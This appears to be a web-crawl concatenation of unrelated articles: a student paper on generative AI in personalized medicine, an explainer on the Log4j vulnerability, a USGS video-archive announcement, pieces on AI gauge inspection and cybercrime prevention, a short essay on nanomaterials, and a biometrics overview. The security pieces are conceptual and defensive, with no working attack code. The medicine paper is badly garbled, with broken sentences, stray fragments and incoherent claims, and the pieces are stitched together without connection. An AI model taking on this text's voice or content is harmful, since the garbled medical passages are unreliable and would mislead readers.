By: K. Sai Spoorthi, Department of computer science and engineering, Student of computer science and engineering, Madanapalle Institute of Technology and Science, 517325, Angallu, Andhra Pradesh.
AI in its generative form is bringing new solutions to the field of individualized medicine, especially in the ways of handling data and drug discovery and processing genomic data. This paper aims to describe the current and potential impact of generative AI for increasing the efficacy and effectiveness of patient/molecular individualized therapy, the latter’s benefits on patients, and the possibility of better use of healthcare organization resources. In this way, generative AI develops individual treatment plans, considering patient’s DNAs, lifestyles, environments, etc. AI integration in drug discovery enhances the rate at which new compounds are found, the general lead optimization, and compile time and costs. Also, predictive modelling and simulations with an AI generator also help in forecasting drug interactions and efficacy for the continued growth of tailored medicine. Also, the area of genomics is presented in this paper, which indicates the use of artificial intelligence in the interpretation of large biological data and in the making of decisions within healthcare. Looking to the generative AI’s future in personalized medicine, it appears that further advancements and developments of new healthcare solutions are on the horizon for technology, healthcare and the ethical field.
Key words: Generative Artificial Intelligence, precision medicine, GAN, VAE,
With an enhanced development rate in recent years, generative AI emerged as one of the strategic change agents in the field of healthcare especially with regard to the field of personalized medicine. As a result, the belief that it is impossible to produce targeted treatments for patients also shifted to the approach of generative AI from the traditional medicine. It also exponentially improves efficiencies throughout the production process. Out of the paradigm shifts, this one has the capacity of improving clinical results to the highest degree, patients’ satisfaction and better utilization of resources within the health institutions. To examine the relationship between generative AI and personalised medicine more closely it is necessary to look at, on the one hand, the technology enablement and on the other hand at the ethical ramifications of such an approach. Familiarizing with these dynamics will offer a conceptual foundation for evaluating how the advent of generative AI will change the possibilities of the individualized model of healthcare and, therefore, enhance the efficiency of interventions.
Generative AI and its relevance to personalized medicine
The advent of Generative AI constitutes a turn in the innovative science of pharmacogenomics as it provides unparalleled opportunity for data processing and analysis in the work of teachers and scholars. In this way, Generative AI can create profound algorithms enriched with big data sets as analytical tools to design prescription treatments based on patient profiles. This level of personalization goes even beyond the previous levels by considering thousands of parameters, DNA, lifestyle, and the environment that make a patient unique, which improves the accuracy of therapy choices greatly. Additionally, Generative AI’s capability to generate new chemical compounds and engineer ideal pharmaceutical agents proves its suitability to enhance drug discovery procedures, comprehending the specific aspects of population heterogeneity. As a result, using Generative AI for the creation of efficient models proves to be appropriate. personalized medicine not only contributes to acute enhanced results in the treatment and approach of patients but also accredit with the general goals of the healthcare system regarding optimization of the work and costs.
Applications of Generative AI in Drug Discovery
The progress in the generative AI is already changing the context of drug development and furthering the goals of modern medicine by unmasks the whole new of opportunities for convenient drug production. accuracy and speed of the methods aimed at the discovery of new substances. Picking up from where we left off, the paper went on to uncover how the use of deep learning algorithms can be harnessed. more accurate prediction of molecular properties and interaction, lead optimization is easier for the researchers. Automatic generation of chemical compounds can be produced with the help of generative models that approach reference targets and render the applied biological exertions drastically more efficient than trial-and-error approaches about time and costs. In addition to this, the approaches involve the use of artificial intelligence thus enabling searches of the enormous chemical space with the possibility of identifying compounds that could otherwise go unnoticed. This not only increases the frequency of additions of new innovations but also increases the probabilities of attaining efficient treatment regimens for complicated diseases, thus leading to more science-based personalized medicine solutions. Specifically in the field of personalised medicine, Gen AI has become so indispensable with the help of complex algorithms such as GAN and VAE. These modes which are complex adopt any challenge and provide a solution like data scarcity, privacy issues, and the complexities of modelling complex human health data. Beneficial connotations with AI and drug discovery based on how generative AI enhances one another makes future initiatives for progress and subsequent investment and research in this area relevant.
Enhancing drug design through predictive modelling and simulation
Progresses in the field of, for instance, predictive modelling and simulation offer new opportunities in drug design with a perspective of radical change. offer researchers instruments that help to improve the outcomes and productivity of the development process. By thus, using such generative AI models in their work, scientists can recreate many interactions in the biological environment and make quite accurate forecasts. how individual elements are going to react once they are incorporated with other chemical entities in the human body. This capability does not only put the speeds up but also enables the identification of potential drug compounds but also helps in the development of these drugs before the latter even being trialled in the clinic. However, when employing an external ML model in the process of drug design, the following advantages are additionally gained: enables end-users—those citizens who use their respective fields of specialty to analyse arrays of data deal with massive data —improving decision makers’ skills .As the as the overall picture of personalized medicine expands, the value of such modern approaches emerges more clearly than before, placing them right at the heart as key building blocks of the search for higher degrees of customization to provide information about treatment that focuses on the patient.
Generative AI in Genomic Data Analysis
Introducing the generative AI in the genomic data analysis is a revolutionary achievement in terms of the task performed by the researchers. interpret complex biological information. Due to the availability of sophisticated algorithms, generative AI can create massive data sets, model genetic variations and find out hidden pattern on the Genomic sequences. This capability does not only increase the level of speed in terms of research but also increase the level of accuracy when it comes to genomic analysis. this makes it more suitable to apply in drug treatment and customization of therapies in the newly developing area of personalized medicine. For example, generative models can mimic the results of different genomic modifications on phenotypic consequences and to make more profound prognosis. disease processes and possible treatment outcomes depends upon the characteristics of the disease. Furthermore, as the AI systems minimise on complexity, as might be expected, due to their versatility in coping with multiple and complex forms of genomic information, they stand to play a huge role in decision-making. analytics and risk assessment, the predetermining of decision-making in the clinical field and thus, enhancing patient specifications. This evolution shows how technology Those who have been following this website will appreciate this evolution because it shows the important intersection of technology and biology to create a map for new and different ways of making treatment available to the patient.a
Conclusion and Future of Generative AI in advancing personalized medicine
The incorporation of generative AI in the construction of precision medicine is a revolutionary improvement in the sphere of medicine that is worthy of discussion. It supports the development of specific interventions aimed at improving a patient’s results. With the merging of inexorable progress of technology with medicine, applications for the use of generative AI to analyse and combine humongous databases and give the evidence for client-centred approach refers to the fact that predictions as well as the nature of the interventions which are appropriate for each client becomes very clear when one is in pursuit of this degree. As an outcome, decision-making becomes contingent on the forecasted probability of an intervention being beneficial, and the likelihood of risk, machine learning algorithms help healthcare providers make better decisions by not only predicting efficacy but also the potential side effects. In addition, there are questions related to the ethical issues, such as data privacy and bias; the stakeholders should establish the proper rules that will protect and regulate the application of AI in the health sector. Personalized medicine’s future is contingent on bringing together experts from technology, clinical practice, and ethical concerns for the enhancement of these instruments to create a brand-new paradigm of health care that is groundbreaking and good.
- K. J. Prabhod, “Leveraging Generative AI and Foundation Models for Personalized Healthcare: Predictive Analytics and Custom Treatment Plans Using Deep Learning Algorithms,” J. AI Healthc. Med., vol. 4, no. 1, Art. no. 1, Mar. 2024.
- G. P. Patrinos, N. Sarhangi, B. Sarrami, N. Khodayari, B. Larijani, and M. Hasanzad, “Using ChatGPT to predict the future of personalized medicine,” Pharmacogenomics J., vol. 23, no. 6, pp. 178–184, Nov. 2023, doi: 10.1038/s41397-023-00316-9.
- M. Rahaman et al., “Utilizing Random Forest Algorithm for Sentiment Prediction Based on Twitter Data,” 2022, pp. 446–456. doi: 10.2991/978-94-6463-084-8_37.
- I. Ghebrehiwet, N. Zaki, R. Damseh, and M. S. Mohamad, “Revolutionizing personalized medicine with generative AI: a systematic review,” Artif. Intell. Rev., vol. 57, no. 5, p. 128, Apr. 2024, doi: 10.1007/s10462-024-10768-5.
- B. Yelmen et al., “Creating artificial human genomes using generative neural networks,” PLOS Genet., vol. 17, no. 2, p. e1009303, Feb. 2021, doi: 10.1371/journal.pgen.1009303.
- L. Triyono, R. Gernowo, P. Prayitno, M. Rahaman, and T. R. Yudantoro, “Fake News Detection in Indonesian Popular News Portal Using Machine Learning For Visual Impairment,” JOIV Int. J. Inform. Vis., vol. 7, no. 3, pp. 726–732, Sep. 2023, doi: 10.30630/joiv.7.3.1243.
- M. Almansour and F. M. Alfhaid, “Generative artificial intelligence and the personalization of health professional education: A narrative review,” Medicine (Baltimore), vol. 103, no. 31, p. e38955, Aug. 2024, doi: 10.1097/MD.0000000000038955.
- Sarin, S., Singh, S. K., Kumar, S., Goyal, S., Gupta, B. B., Arya, V., & Chui, K. T. (2024). SEIR‐driven semantic integration framework: Internet of Things‐enhanced epidemiological surveillance in COVID‐19 outbreaks using recurrent neural networks. IET Cyber‐Physical Systems: Theory & Applications.
- Gupta, B. B., Gaurav, A., Attar, R. W., Arya, V., Alhomoud, A., & Chui, K. T. (2024). A Sustainable W-RLG Model for Attack Detection in Healthcare IoT Systems. Sustainability, 16(8), 3103.
Spoorthi K.S. (2024) Generative AI in Personalized Medicine, Insights2Techinfo, pp.1 | <urn:uuid:7e2645a2-1270-4eaf-ae68-bc5adc62d0d8> | CC-MAIN-2024-38 | https://insights2techinfo.com/generative-ai-in-personalized-medicine/ | 2024-09-07T14:45:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00087.warc.gz | en | 0.894233 | 2,530 | 2.671875 | 3 |
A recently discovered vulnerability in the popular Log4j software has presented a field day to hackers while leaving the cybersecurity community scrambling. Log4j is part of the Java programming language used by millions of websites and apps, including Apple iCloud, Amazon Web Services, and Minecraft. Experts estimate that attempts to exploit the code have reached hundreds of thousands or even millions.
Jen Easterly, U.S. Cybersecurity and Infrastructure Security Agency (CISA) director, commented, “The Log4j vulnerability is the most serious vulnerability I have seen in my decades-long career.”
What is Log4j?
Log4j is open-source software provided by the Apache Software Foundation, ubiquitous to many operating systems. The software records system events and communicates them to administrators and users.
For example, if you type the wrong web address, you receive a 404-error message saying the page you are looking for does not exist. The web server uses Log4j to record that event and transmit it to system administrators.
Log4Shell: The Log4j Vulnerability
Log4Shell, the zero-day vulnerability in Log4j, allows users to create custom code for formatting a log message. If there were no malicious actors in the world, that would be fine. But what happens when hackers discover that they can create custom codes? They can send them to targeted computers that can steal personal information, take control of the system, and more.
For example, hackers can trigger log messages (like the 404-error message) that include malicious content. Log4j will process the message, creating a reverse shell and allowing hackers to gain remote control of the server.
So far, there have been reports of hackers installing cryptocurrency mining software on hacked computers, ransomware attacks on Minecraft users, and geopolitical enemies breaching each other’s government agencies and businesses.
Why Are the Challenges of Log4Shell So Significant?
Several aspects of Log4Shell make it very serious. First, Log4j software is incredibly widespread. It is not like the lock of one door is broken, but the locks of millions of doors.
Second, Log4j is often bundled with other software, so some system administrators do not even know their systems use it. Cybersecurity experts have been working around the clock just to ascertain whether their clients have Log4j in their systems.
For now, CISA has announced the release of a scanner that can identify web services impacted by certain Log4j remote code. That will help companies who are not aware of their digital assets, but not those whose data has been compromised.
A third challenge regarding Log4Shell is that it is relatively easy to exploit—in Minecraft it is as simple as typing one line of malicious code into the public chat box. But while exploitation is easy, patching it requires intense, customized effort from cybersecurity experts. The fix depends on how the software is incorporated into the system and can require different plans of action.
Preparing for Future Attacks
The discovery of Log4Shell has left companies and government agencies scrambling to see whether their systems use Log4j and whether they need to be patched. But is there anything we can learn about this vulnerability that can help prepare for future attacks? At this stage of the game, we know that cyberattacks are regular occurrences. The question isn’t “if” another large-scale flaw will be exploited, but “when.”
According to Mark Manglicmot, Vice President of Security Services at Arctic Wolf, the Log4j vulnerability highlights the importance of every company knowing their digital assets. Companies that don’t know what they have will be left playing catch-up when the next big attack hits. Those that are aware of their digital assets will be able to mitigate the damage more quickly. | <urn:uuid:397320a6-d2cc-444a-ac80-7bcb27b3453d> | CC-MAIN-2024-38 | https://www.interforinternational.com/the-far-ranging-and-terrifying-implications-of-log4j/ | 2024-09-07T13:31:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00087.warc.gz | en | 0.94222 | 778 | 3.25 | 3 |
U.S. Geological Survey Builds Video Archive with Convera
The U.S. Geological Survey (USGS) has selected Convera to supply digital content management solutions for its archive of scientific video.
The USGS will use the Convera Screening Room to capture, archive and manage its collection of video products and b-roll footage, to create an archive of material that can be published to the Internet. The footage, which was captured by USGS researchers, contains significant biological, hydrological and geological occurrences, such as natural disasters. The system will be installed at the USGS' Earth Resources Observation Systems Data Center (EDC), home to the world's largest collection of satellite images and aerial photographs of the Earth's landmasses.
"Sharing USGS video assets with educators, scientists and other interested individuals over the Web gives us an extraordinary new capability for providing the nation with reliable scientific information about the Earth," says Kevin Laurent, Senior Computer Scientist, USGS. "With Convera Screening Room, we will be able to capture, search for and publish video footage to the Web on topics, such as earthquakes, volcanoes, floods, coastal erosion and wildlife disease. This new capacity allows us to more effectively get visual data into the hands of researchers and the media."
Convera Screening Room provides scalable, high-performance access to any video asset (analog or digital) from an ordinary Web browser. With Screening Room, users can automatically capture video; browse visual summaries (called "storyboards"); catalog content using metadata, annotations, closed caption text, and voice sound tracks; search for precise video clips using text and image clues; create rough cuts and "Edit Decision Lists" for further production; and publish those video assets to the Web for streaming.
For more information, visit www.usgs.gov, or www.convera.com | <urn:uuid:f92281e9-03df-47e6-8220-71baa723293c> | CC-MAIN-2024-38 | https://esj.com/articles/2001/03/27/us-geological-survey-builds-video-archive-with-convera.aspx | 2024-09-09T22:16:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651157.15/warc/CC-MAIN-20240909201932-20240909231932-00787.warc.gz | en | 0.869887 | 387 | 2.640625 | 3 |
Nowadays, AI visual inspection is widely used for defect detection and quality control. Solutions based on AI identifying and analyzing quality issues provide preventive maintenance and cut overhead expenses for business owners.
How does visual AI inspection related to analog gauge happen? One needs to read and verify analog gauges to spot errors concerning drift, environment, electrical supply, and so on.
In order to read information from the analog gauge, we need to do two things:
- Detect the bounding box of the analog gauge in the picture
- Read values from the analog gauge.
Since it’s a tedious and time-consuming task, automation seems like a plan. AI offers an automatic reading approach that simplifies the procedure and allows to detect anomalies and prevent production line stoppage.
Visual Inspection: Object Detection
The most efficient way to detect objects in an image for today is an approach based on convolutional neural networks. In general, the problem of object detection today can be considered solved, if you have a sufficiently large and sufficiently diverse dataset, then there is no problem to train the object detection model. Let’s take a quick look at what a complete learning process usually looks like. Typically, the process includes the following steps:
- Unlabeled data preparation
- Dataset labeling
- Model Training
At each of these steps, there are many options for what tools to use to complete it, let’s dwell on each in more detail.
Unlabeled data preparation, at its best, assumes that data in your company came about in some natural way. For example, your company is engaged in AI-driven inspection and you already have many analog gauge images from practice. You even have computer vision predictive maintenance solutions. If there is no data, then you can always try to buy it from such companies or from companies that specialize in datasets labeling. There are other ways as well, but they are more likely to collect data in order to make a POC. This, for example, collecting data through crowdsourcing or using utilities such as google-images-download.
As for training the model, although this is not the most trivial task, a large number of frameworks are available and a lot of tutorials have already been written on how to use them. This is a big topic, so here are just some of the tools you can use during this step: mmdetection, detectron2, tensorflow object detection API, etc. These frameworks allow you to choose the right balance of processing speed and accuracy by providing different backbones. Including there are solutions that will allow you to work in real-time.
The second step today cannot be called a solved task. Let’s take a look at several options on how to do this.
Classical Computer Vision Approach
Let’s start with the classic approach. It essentially consists of two algorithms:
- Circles detection
- Lines detection
Further, having a circle, and knowing the position of the needle, knowing the model of the analog gauge, we can accurately find out the value to which the needle points.
The bad thing about classical methods, however, is that they are not robust. Problems can arise from unusual or strong lighting, dirt, the specific shapes of the analog dials, and many other things. In any case, it is impossible to predict everything, and often, for the most unusual reasons, something may go wrong. Here are some examples:
For example, in this picture, a circle was detected incorrectly.
And here, the needle was detected from the opposite side. This may well be considered a false positive.
In addition to these errors, of course, the most frequent ones are when not a single circle or line was detected. For each specific picture, this can be corrected so that the algorithm works, but in the general case, it is impossible to foresee all the options. It is instability that makes the use of classical computer vision algorithms niche. This approach only works if you are completely confident in your data and that it will never change, and if it does, then within some reasonable limits. Therefore, for cases where the data may change significantly, other approaches are required.
AI-Based Visual Inspection
The advantage of deep learning and AI algorithms for predictive maintenance is that they are usually much more robust. This is achieved due to the fact that during the training of the algorithm, the model learns from the dataset all the variety of possible options that are there, and in the end, it turns out that the model learns to recognize key features, ignoring things like lighting, dirt, etc. Of course, it is possible only if the data is diverse enough.
There are at least several options for how you can solve this problem using neural networks. For example, a key-points detection-based approach, where you need to train the model to detect the center of the circle and the needle end. Knowing this, we can find the angle at which the needle is turned and, knowing the analog gauge model, determine what value the needle shows.
It is also a possible option when we need to detect the needle itself, and because we generally know the position of the center, due to the fact that the analog gauge always has the shape of an ellipse, which means that it is symmetrical. But since we have already detected it at the previous stage, then we can assume that the center of the circle will be right in the center of the object detected at the first stage. This option seems less accurate, but it is easier to train such a model.
The third option is to segment the dial and then try to predict the angle of rotation of the needle. This option is discussed in more detail here, and there are a lot of tricks that are improving efficiency, but in short, the advantage is that the data can be artificially generated by having examples of empty dials and turning the arrow artificially.
But, as noted above, all variants based on CNN have a significant disadvantage – they require data and labels.
Using of OCR
We have not yet mentioned the fact that different sensors have different scales. This problem can be solved for example with the help of OCR. Even though not all values can be recognized, if we can restore the circle, using this machine learning technology it is possible to restore the values on the scales. Here’s an example of how the Google Vision API being within the Google Cloud ecosystem, works:
Why Build an AI Visual Inspection System? The Takeaway
Analog gauge recognition is only one example of how you can automate visual inspection. Using data science and especially deep learning it looks like it is possible to build an almost fully automated visual inspection system. At least it is definitely possible to remove the most annoying and routine visual checks which humans do manually. And although this will not help in rare cases with specific gauges or where some deep expertise is required, it still seems that AI-driven inspection can significantly reduce the costs on many manufactures.
Have a project related to analog recognition? Want to use AI for predictive maintenance? Get help from a team of skilled AI architects and engineers. | <urn:uuid:ea711d11-c5e2-4789-863c-63075e081b56> | CC-MAIN-2024-38 | https://indatalabs.com/blog/ai-inspection | 2024-09-14T20:20:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00387.warc.gz | en | 0.943121 | 1,456 | 2.546875 | 3 |
In the dangerous realms of the cyber universe, how can one stay truly safe and secure? In our previous article, we covered some of the most significant types of cybercrimes, their purposes, and the methods that the majority of cybercriminals use. Now that we understand the threat cybercrimes represent and are aware of the variety of dangers, it is time for preparations. The question is, how? What precautions should we take in order to protect our computers and personal data against cybercrime? Here are 3 complete ways on how to protect yourself from cybercrime.
Increasing Public Awareness On How to Protect against Cybercrime
Even in 2020, a year that forced everyone to use the internet and computers for fulfilling the needs of their daily life, a large portion of the population is unaware of the dangers that can threaten their lives. People are not educated about cybercrimes and the way these scams work; therefore, they do not know how to prevent them. After all, as we mentioned before, most hackers use lies and manipulations in order to find their way into the computer systems of companies and individuals.
The sad truth is that many of these cybercriminals are not even experts or masterminds; yet, lack of awareness makes most people an easy target for anyone with a little knowledge of hacking. For instance, many people still tend to open a phishing email message and hence jeopardizing their private data. Human error is a leading cause of many cybercrimes and we must start increasing public awareness and educate them about different types of cybercrimes, the ways they are committed, and how we can prevent them from happening.
Taking Personal Precautions
There are certain precautions that every user should take while surfing on the internet; whether they are using their laptop, smartphone, or office computers. While these precautions are pretty simple and easy to follow, not regarding them can lead to regrettable outcomes.
Use strong passwords. The first step of securing your accounts is probably choosing a strong password. Try to choose a password that is not similar to your name, phone number, or date of birth which are obviously shared with everyone. It is recommended that the password you create would have at least 12 characters and be a mix of capital letters, lower-case letters, numbers, and symbols in order to become much harder to crack. Also, avoid using the same password for all of your accounts. This way, in case someone hacked your password in one website, they would not gain access to all of your accounts.
Avoid suspicious URLs. Always pay attention to the URL addresses you click on and check whether they look legitimate. Fake pages often look exactly like the main websites; so never forget to double-check their exact address carefully. Avoid clicking on links with unfamiliar or suspicious-looking URLs. Always double-check the URL before signing into your account, making transactions, or adding your personal data on a website. If your internet security product includes functionality to secure online transactions, do not forget to enable it before carrying out any financial transactions.
Never download or open file attachments from spam emails or unknown senders. Always check the senders’ email addresses before opening their message and more importantly, before downloading any attachments. Even if the sender’s name looks familiar and it seems like it was sent from a person you know, always double-check the email address to see if it matches with the real email address. One of the most common ways for viruses and malware to find their way into victims’ computers has always been through email attachments; so never open the attachments in messages from unknown senders or spam emails.
Never click on links in spam emails or untrusted websites.
Like email file attachments, always avoid clicking on links in spam emails, messages from unknown people, or even websites. Most of the links provided from suspicious websites contain malware and can threaten your online safety.
Never share your personal information unless you are absolutely sure about the security.
Whether it is on a website, email, or even over phone calls, never ever share your personal information unless you are absolutely sure about both the identity of that person and the security of the platform. Pretty much like how you do not share your information with just anyone in the streets, you should also avoid giving out your private data to unknown people and websites on the internet. Naturally, when it comes to more sensitive information such as passwords and security data, you just do not share anything with anyone, even if that person claims to be from a company’s security team.
Keep your software apps and operating systems updated.
Companies keep updating their software programs not just to add new features, but also to fix the holes and flaws in the security system of their apps. So keeping your software and more importantly, operating systems up to date, ensures that you benefit from the most recent security patches to protect your information.
Do not trust anyone who claims to be from a company or bank
Whenever you received an email message from a company, check their address and make sure it is the official email of that company rather than a scam. Even when someone calls your phone and claims that they are from a company, hang up; and then call the number on their official website to make sure that you are speaking to them, not a cybercriminal. You can even contact the company with a different phone since some cybercriminals can hold the line open.
Beware of public Wi-Fi risks.
The security of public Wi-Fi can leave you vulnerable to many different types of cybercrimes. In order to stay clear of potential cyber-attacks, it is recommended to use the most updated software and avoid using password-protected websites that contain personal information while you are on public Wi-Fi. Apart from these, another secure way is to use a Virtual Private Network (VPN). VPNs are designed to create a secure network in which all data sent over a Wi-Fi connection is encrypted.
Use Of Cyber Security
While preventing typical human errors can remove a high percentage of cybercrime possibility, having a fully secured computer or network requires the assistance of proper software; which brings us to Cyber Security.
Cyber Security, which is sometimes referred to with other names such as IT security or computer security, is the body of technologies and processes designed to protect computer systems, networks, and devices from the dangers of cybercrimes or damage to their hardware, software, or electronic data, as well as from the disruption or misdirection of the services they provide. In order to truly keep personal and business networks and devices safe from unauthorized accesses or malicious attacks, it is essential to use a number of different types of Cyber Security such as Antivirus Software, Internet Security, or Endpoint Security.
The first big smart step in securing your computer and network devices is probably installing proper anti-virus software on them; whether it is a personal laptop or a work-related device. Antivirus software programs are designed to scan the data on computers in order to detect dangerous software, and then remove any threats before they start causing problems. Anti-Virus also scans incoming files and codes that are being passed through your network traffic. Having this protection in place helps you protect your computer and data against various types of cybercrimes. Just make sure to always keep your anti-virus software program updated so that you would benefit from the latest protection advances.
But how do they work?
How do these anti-virus programs detect malware? Well, the developers of antivirus software programs compile an extensive database of already known viruses, worms, and malware and then teach the software how to detect and remove them. So when different files, apps, and software programs are moving in and out of your system, the antivirus compares them with its database and tries to find matches. The files that are similar or identical to the database will be deleted. This is why keeping an antivirus program updated is important; cause many of these updates, add more data to the database of known malware and viruses.
Another interesting fact about antivirus software programs is that their settings are adjustable as they are programmed to work both automatically and manually. Almost every anti-virus program scans the computer for malicious files automatically but you can also have them do a manual scan as well. In manual scans, you can just sit and see in real-time which malicious files were found and neutralized. You can also choose whether the antivirus program should remove harmful files automatically or ask your permission before cleaning them. Antivirus software programs usually run in the background and check every file that is opened to prevent the system from becoming infected.
Internet Security is another type of Cyber Security that focuses on online threats on the World Wide Web. As we explained in our previous article, most cybercriminals break into people’s computers throughout the internet; and that makes the job of Internet Security even more significant. The objective of Internet Security is to establish rules and measures to use against attacks over the Internet to ensure the security of networks. In the process, internet security prevents attacks targeted at browsers, networks, operating systems, and other applications.
Many methods are used to protect the transfer of data, including encryption and from-the-ground-up engineering. Some of the most common and significant among them are Firewalls, Access Controls, Data Loss Prevention (DLP), Distributed Denial-of-Service Prevention, and Email Security.
As you already know, Email messages are where most cybercrimes occur; they just create doors for viruses, worms, Trojans, and other types of malware to enter computer systems. That is why establishing comprehensive and multi-layered email security for reducing exposure to emerging threats is essential. Apart from that, Email messages should get secured by using cryptography, such as signing an email, encrypting the body of an email message, and encrypting the communication between mail servers. Last but not least, having at least two factors of authentication by users for accessing email accounts and websites is a great security addition.
Another good method of securing networks is using a Firewall system. Firewalls act as filters that control access between networks and protect devices by allowing or denying access to a network. In other words, a Firewall, as its name suggests, is like a wall that keeps harmful files away and prevents malevolent codes from being embedded onto networks. Apart from that, Firewalls can also block dangerous traffic by screening network traffic.
How do they work?
Firewalls consist of various types of filters and gateways that impose restrictions in incoming and outgoing network packets to and from private networks. Any traffic that either enters or exits must pass through the firewall. With a specific set of rules that are designed into a Firewall for identifying dangerous malware, only authorized traffic would be able to pass through. Also, Firewalls create checkpoints between an internal private network and the public internet. Firewalls can also limit network exposure by hiding the internet network system and information from the public internet.
Endpoint Security refers to a software approach for ensuring that all the endpoint devices, or end-user devices, in a network maintain certain levels of safety and security. Endpoint devices are systems such as computers, smartphones, tablets, or even scanners that are connected to a network by the internet. All of which serve as points of access to an enterprise network, and create attack paths and points of entry that can be exploited by malicious files. Therefore, Endpoint Security aims to secure every endpoint and tries to make sure that these devices follow a definite level of compliance to standards in order to avoid potential threats.
Endpoint Security is especially effective and beneficial for companies, whether they are small local businesses or huge multinational corporations. In a company network, anything that employees use for communicating with one another and share data can be vulnerable. However, Endpoint Security helps us to identify and manage the users’ computer and data access over a corporate network. With Endpoint Security, the network administrator can restrict the use of sensitive data as well as certain website access to specific users, in order to maintain and comply with the policies and standards of the organization. In addition, encrypting data on endpoints and removable storage devices are very useful in preventing data leaks.
Worst Case Scenario
In the worst-case scenario when everything has failed and you become the victim of a cybercrime, noticing the data breach and reporting it quickly is very important. Keep an eye on your bank statements and check all of your account’s transactions. And companies should have regular checkups and use proper tools in order to spot occurred any cybercrime faster. | <urn:uuid:0b793ecf-f96f-4959-8716-c87d3a9f6a93> | CC-MAIN-2024-38 | https://newcomme.com/how-to-protect-yourself-from-cybercrime-part-3/ | 2024-09-16T01:43:09Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.29/warc/CC-MAIN-20240916012328-20240916042328-00287.warc.gz | en | 0.945556 | 2,569 | 2.75 | 3 |
The Health Effects of Nanomaterials: The march of progress has continued to bring interesting insights to us as newer and newer fields of science are being discovered, which boasts broad applications in our daily lives; even in the field of healing. The prospect of re-engineering and controlling mankind’s every aspect right down to our genes is tempting. While it might be tempting, the use of Nanomaterials has serious ethical and environmental issues to deal with first. So what are the pros and cons of using Nanomaterials in the health industry? Here are a few listed below:
- Drug delivery:
The method of delivering drugs to patients will be revolutionized with the use of Nanomaterials. Not only will it make treatment easier by being much more targeted and efficient, it will also be much quicker and often lifesaving. By using Nanomaterials the risks associated with the delivery of drugs are also minimized and the dosage will also be decreased, which is good especially with the drugs that have quite a lot of side effects of their own. In other words, Nanomaterials, more specifically nanoparticles, which are pitched so to be up to the task are going to change the face of medicine as we know it, for the better.
- Molecular Imaging:
Molecular imaging is quite an important discipline in the field of biology on which hinges the detection and diagnosis of hard to catch diseases and often the difference between life and death of a patient. After all, the reaction of molecules is all that acts as an indicator to disease. Conventionally, fluorescent probes are used for molecular imaging because of their inherent property of inertness which guarantees that aside from the organic dyes which would mark the spot of cellular change, the marker itself would not react at all and hence will not deteriorate any malignant change in the cellular structure or molecular structure.
- Severe cardiovascular and pulmonary effects:
It’s no secret that since the Industrial Revolution hit, the presence of nanoparticles in the air has often posed significant danger to human health, and as humans progressed, the risk has only increased. The presence of higher amounts of lead in the air itself is the cause of so many respiratory problems and cardiovascular diseases that in itself is truly terrifying.
- Ethical boundaries:
While Nanomaterials do have significant positive impact on the health industry, any technology used in an unethical manner becomes difficult to bear and often dangerous. The regulation of Nanomaterials is important but there is only so much any regulation can control.
The use of Nanomaterials can be a boon or a curse depending on your viewpoint. Considering that it has such a potential, it would be a mistake to ignore it entirely. So of course we should put regulations on Nanomaterials but not dismiss it entirely. | <urn:uuid:4c5d3c82-35a5-471b-8ff2-3ef0476c92ad> | CC-MAIN-2024-38 | https://beyondexclamation.com/the-health-effects-of-nanomaterials/ | 2024-09-17T09:59:41Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00187.warc.gz | en | 0.963179 | 572 | 3.1875 | 3 |
Using Biometrics in Security: Pros & Cons
Biometrics may sound like a new type of technology, but it has actually been around for decades and for a good reason—biometrics are hard to hack.
Why are biometrics used for security? Biometrics are used in security because they are always with you, and they are difficult to steal or replicate. This creates a much stronger security system for any organization’s network.
What Are Biometrics?
Biometric authentication, often referred to as “biometrics,” uses physical characteristics from a user as a credential for secure authentication and identity verification. Unlike other forms of authentication (like passwords or tokens), biometrics rely on essentially immutable, unique facets of a physical user to strengthen security by requiring both a strong form of verification and the physical presence of the user at the point of collection.
Generally speaking, there are three types of biometric security:
- Biological: These types are data from individuals at the molecular level, including DNA, blood samples, or other materials. These are incredibly \difficult to collect without special facilities.
- Morphological: These are physical structures on the body, including traits like eyes, faces, fingerprints, and so on. These are often the most common authentication used in business and consumer systems.
- Behavioral: These biometrics use ticks, patterns, and behaviors to determine identity. Behavioral authentication can include typing analysis, speech analysis, gait analysis, and so on. While these are becoming a more common form of authentication, behaviors are, strictly speaking, one of the easier forms of authentication to fake.
In order to be useful, a biometric marker must be unique (either absolutely or nearly so) to every user while also being feasible to collect. Therefore, standard forms of biometric authentication include the following:
- Fingerprints: Many mobile devices, from tablets to smartphones, already come with fingerprint scanners that can read this form of biometric. Fingerprint scanners are relatively easy to implement and have become a common form of authentication for access to physical devices and as part of multi-factor authentication solutions.
- Facial Scans: Modern iPhones and many laptops have migrated to facial scans. An embedded camera will take a facial picture or video as input and compare it against unique scanning information.
- Iris Scans: Much like fingerprints and faces, the human iris is seen as a secure and unique form of biometric authentication. More modern applications are looking at iris scanning (if they haven’t already implemented it) because they work with the same technology that a facial scan does—a camera or other sensor.|
- Voice Recognition: Voice authentication was often considered unsuitable for verification because it was relatively easy to fake. However, a few years and innovations later, voice is seen as a viable and useful form of biometric authentication.
Outside of these common types, there are others that, while useful, are used less, or in unique circumstances:
- Gait Recognition: Machines can analyze gait style to determine user identity. Deploying this kind of biometric authentication is rather difficult in any situation unless using video cameras in a public space.
- Blood and DNA: DNA and blood samples are, almost exclusively, seen as private health information, and outside of particular health considerations, criminal investigations, or the highest levels of security, DNA isn’t seen as a viable, or even necessary, form of biometric identification.
What Are the Components of a Biometric Security System?
The components of a biometrics system are similar to other authentication systems, with the added hardware and software for processing biometric data.
The following are typical components of a biometric system:
- Input Sensors: To collect and compare biometric data, hardware must be in place to gather that data. In the earliest days of bio-authentication, one of the biggest limiters against adoption was the availability of collection devices. Still, the explosion of mobile devices and affordable hardware has changed that reality drastically.
Input sensors will vary based on the type of biometric authentication. Fingerprint scanners, for example, are almost always embedded into hardware as a distinct finger pad that can read that information. Facial and iris scanners leverage the availability of cameras in devices to take physical images of these body parts.
